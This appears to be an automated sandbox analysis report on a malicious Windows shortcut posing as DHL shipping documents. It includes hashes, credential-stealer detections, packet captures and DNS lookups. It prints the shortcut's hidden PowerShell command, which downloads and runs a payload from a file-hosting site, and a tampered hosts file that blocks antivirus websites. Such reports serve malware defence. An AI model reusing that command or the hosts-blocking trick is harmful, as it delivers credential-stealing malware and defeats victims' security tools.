Preview:	...................................FL..................F. .. ...p...W...8..?.T..'M.>.T..@............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.......W....1.?.T....x.2.@....Y - .DHLAWB~1.LNK..\......EW.5.Y -...........................pD.D.H.L. .A.W.B.-.d.o.c.u.m.e.n.t.s...l.n.k.......^...............-.......]....................C:\Users\user\Desktop\DHL AWB-documents.lnk..`.......X.......721680...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwH.Y -....3...................../...W.i.n.d.o.w.s.....Z.1......Y.-..System32..B......OwH.Y.-..........................>.t.S.y.s.t.e.m.3.2.....t.1......O.I..Windo

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fe6f89e84e68fd0f.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4508
Entropy (8bit):	3.78446341859127
Encrypted:	false
SSDEEP:	48:7lqQQuAGs+ZYVb6GlHJzSogZo45YVb6GlLzSogZoc1:M2Aq+b6GqH/+b6GcHz
MD5:	9AB3AE3EBEFC693DD916FC62733B9D74
SHA1:	C37459F899B1634DAC68A471FA1EB8DC67A31703
SHA-256:	72B42A4CA356F18F097BF555B6AF39281E5FAF763726066BE93379BF6D6B4795
SHA-512:	51B6CB3D23A35C68A83C1C969EB83B8F4779E8F1A3B930BD3EDCAC50BC458E600FB4CC722CE34D1D80F479AC3514DA383A304951335B60B3E39AE3DF1F795664
Malicious:	false
Preview:	...................................FL..................F. .. ...p...W...8..?.T..'M.>.T..@............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.......W....1.?.T....x.2.@....Y - .DHLAWB~1.LNK..\......EW.5.Y -...........................pD.D.H.L. .A.W.B.-.d.o.c.u.m.e.n.t.s...l.n.k.......^...............-.......]....................C:\Users\user\Desktop\DHL AWB-documents.lnk..`.......X.......721680...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwH.Y -....3...................../...W.i.n.d.o.w.s.....Z.1......Y.-..System32..B......OwH.Y.-..........................>.t.S.y.s.t.e.m.3.2.....t.1......O.I..Windo

C:\Users\user\Downloads\setup_x86.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	190464
Entropy (8bit):	5.995125051419421
Encrypted:	false
SSDEEP:	3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
MD5:	E09F55D421CB45340A8C97C217BA56CF
SHA1:	2280AFE7BB2D07C315E2599C21F069DD1B7CE3B8
SHA-256:	1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
SHA-512:	0D690F46D18855009AF0B15A8E352DBE178DE4D0F055FAB00CC18837AD30AEE3FFFFEF5263BB6598FF0E6BA7DBB55029CE976101BE853CB03B01B9B440418C8B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\Downloads\setup_x86.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: apDMcnqqWs.exe, Detection: malicious, Browse Filename: https___files.catbox.moe_l2rczc.pif.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`.....................................O.......P.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...P...........................@..@.reloc....... ......................@..B................@.......H...........@T......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t...0.............(....,..r...ps....z..0..!..........,..o.............(....Q+...Q.....0..5........(.......(....-#.,..o.....(....-..%-.&(......o.....&...(....^......(.....(.........^......(.....(...........0.......... ....s........(....-...o....2.(....(....*..0..........

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\Users\user\Downloads\setup_x86.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2285
Entropy (8bit):	4.576057831611122
Encrypted:	false
SSDEEP:	48:vDZhyoZWM9rU5fFc7w09PI8A+VyUq8UwWsnNhUm:vDZEurK9z8TwU0wWsn/
MD5:	A58B2342D8EAA7EA695FD216006E3DDD
SHA1:	A286457D10D2A50E7B2699BDF55D85081FADD23C
SHA-256:	C3AF2F576A3758B1BCDBD491B6021FBF52F6AFF4C0D03F4914D9C3F51A6A6361
SHA-512:	B1938B288BECE554759F4FA8341513828487960991AE6C4A8C4D3958A5669357A6C2F1ED140FF87E740DC4C6AFEB9F16967AE7F4000F41341B802D22D8CE8FC3
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 virusscan.jotti.org..0.0.0.0 www.virusscan.jotti.org..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):	3.465033295144974
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	DHL AWB-documents.lnk
File size:	1'344 bytes
MD5:	5e3249c32a70dc3b8d108c8bfe50c4d0
SHA1:	724787b337134448fd07cc626f9fa7edf978db3f
SHA256:	b3be3371628c3633b544d0e73a2b0dfe93faef9f49cea25b7b88d7a9d9a1bccf
SHA512:	ac1c5943f14932d02acd142f8942e4ed9a929beabe3b9594e96c51da3441d356fa46a6fc8b54b1f83c43ff731f39d501fdef426c35da70f9cc28efb988196c0a
SSDEEP:	24:8A4/BHYVKVWU+/CWQiAGfcPa2ijC9tUMkWbjC9PHhGO:8x5aqrPaOtH2Z
TLSH:	0B2108145EF30724E7B7DA396CBEB311C9763C82EE618F8D014116896965620F9B0F3B
File Content Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	14ec98b2bae9ed0d

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument:	-windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
Icon location:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 06:41:04.531625986 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:04.531697989 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:04.531873941 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:04.545478106 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:04.545491934 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:06.342026949 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:06.342147112 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:06.346334934 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:06.346360922 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:06.346657991 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:06.358015060 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:06.399370909 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.027945995 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.027966022 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.027985096 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.028039932 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.028065920 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.028101921 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.028122902 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.063100100 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.063116074 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.063205004 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.063221931 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.063275099 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.219764948 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.219780922 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.219866991 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.219885111 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.219938993 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.253201962 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.253216982 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.253410101 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.253426075 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.253479958 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.289316893 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.289334059 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.289545059 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.289558887 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.289618969 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.320444107 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.320460081 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.320593119 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.320609093 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.320785999 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.431032896 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.431046963 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.431238890 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.431257010 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.431333065 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.456743956 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.456757069 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.456859112 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.456875086 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.456931114 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.481056929 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.481071949 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.481174946 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.481189966 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.481272936 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752553940 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752563000 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752589941 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752646923 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752702951 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752727985 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752736092 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752753019 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752759933 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752794027 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752811909 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752830029 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752830029 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752849102 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752868891 CET	443	49708	108.181.20.35	192.168.2.6
Dec 23, 2024 06:41:07.752877951 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752877951 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752912998 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.752912998 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:07.781420946 CET	49708	443	192.168.2.6	108.181.20.35
Dec 23, 2024 06:41:28.358524084 CET	49751	80	192.168.2.6	208.95.112.1
Dec 23, 2024 06:41:28.478295088 CET	80	49751	208.95.112.1	192.168.2.6
Dec 23, 2024 06:41:28.478436947 CET	49751	80	192.168.2.6	208.95.112.1
Dec 23, 2024 06:41:28.478689909 CET	49751	80	192.168.2.6	208.95.112.1
Dec 23, 2024 06:41:28.598164082 CET	80	49751	208.95.112.1	192.168.2.6
Dec 23, 2024 06:41:29.687685013 CET	80	49751	208.95.112.1	192.168.2.6
Dec 23, 2024 06:41:29.698260069 CET	49751	80	192.168.2.6	208.95.112.1
Dec 23, 2024 06:41:29.818286896 CET	80	49751	208.95.112.1	192.168.2.6
Dec 23, 2024 06:41:29.818351984 CET	49751	80	192.168.2.6	208.95.112.1
Dec 23, 2024 06:42:06.289105892 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:06.289166927 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:06.289236069 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:06.289763927 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:06.289788961 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:07.514029026 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:07.514369965 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:07.519421101 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:07.519438028 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:07.519718885 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:07.535598993 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:07.583334923 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:07.900443077 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:07.900491953 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:07.940963984 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:07.990262032 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:08.262172937 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:08.262358904 CET	443	49840	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:08.262459040 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:08.278028965 CET	49840	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:08.279540062 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:08.279587030 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:08.279695988 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:08.280045986 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:08.280061007 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.489530087 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.491031885 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.491044044 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.865442991 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.865478039 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.865720987 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.865725994 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.865814924 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.865828037 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.865839958 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.865853071 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.865917921 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.865922928 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866076946 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866091967 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866436005 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866447926 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866472960 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866483927 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866487026 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866513014 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866523027 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866532087 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866545916 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866552114 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866559982 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866568089 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866614103 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866619110 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866717100 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866727114 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866810083 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866817951 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866880894 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866889000 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.866988897 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.866997004 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867074013 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867080927 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867185116 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867192030 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867271900 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867280960 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867347002 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867353916 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867413998 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867430925 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867505074 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867511034 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867567062 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867578983 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867655039 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867666960 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867674112 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867677927 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867707968 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867718935 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867753983 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867760897 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867780924 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867789984 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867866039 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867878914 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.867949963 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867959976 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.867990017 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.868066072 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.868124962 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.868205070 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.911358118 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.911705971 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.911941051 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.911995888 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.912147045 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.912224054 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.922537088 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.922734022 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.922985077 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.923023939 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.923038006 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.923048973 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.923113108 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.963340044 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:09.963679075 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.963907957 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.964056969 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:09.964276075 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:10.007342100 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:10.007463932 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:10.051357031 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:11.260668993 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:11.260833979 CET	443	49846	162.159.138.232	192.168.2.6
Dec 23, 2024 06:42:11.260902882 CET	49846	443	192.168.2.6	162.159.138.232
Dec 23, 2024 06:42:11.261363983 CET	49846	443	192.168.2.6	162.159.138.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 06:41:04.058192015 CET	56955	53	192.168.2.6	1.1.1.1
Dec 23, 2024 06:41:04.519037962 CET	53	56955	1.1.1.1	192.168.2.6
Dec 23, 2024 06:41:28.219326973 CET	61675	53	192.168.2.6	1.1.1.1
Dec 23, 2024 06:41:28.357765913 CET	53	61675	1.1.1.1	192.168.2.6
Dec 23, 2024 06:42:06.151074886 CET	56418	53	192.168.2.6	1.1.1.1
Dec 23, 2024 06:42:06.288237095 CET	53	56418	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 06:41:04.058192015 CET	192.168.2.6	1.1.1.1	0xe852	Standard query (0)	files.catbox.moe	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:41:28.219326973 CET	192.168.2.6	1.1.1.1	0x9021	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:42:06.151074886 CET	192.168.2.6	1.1.1.1	0xe460	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 06:41:04.519037962 CET	1.1.1.1	192.168.2.6	0xe852	No error (0)	files.catbox.moe	108.181.20.35	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:41:28.357765913 CET	1.1.1.1	192.168.2.6	0x9021	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:42:06.288237095 CET	1.1.1.1	192.168.2.6	0xe460	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:42:06.288237095 CET	1.1.1.1	192.168.2.6	0xe460	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:42:06.288237095 CET	1.1.1.1	192.168.2.6	0xe460	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:42:06.288237095 CET	1.1.1.1	192.168.2.6	0xe460	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 23, 2024 06:42:06.288237095 CET	1.1.1.1	192.168.2.6	0xe460	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

files.catbox.moe

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49751	208.95.112.1	80	1220	C:\Users\user\Downloads\setup_x86.exe

Timestamp	Bytes transferred	Direction	Data
Dec 23, 2024 06:41:28.478689909 CET	79	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
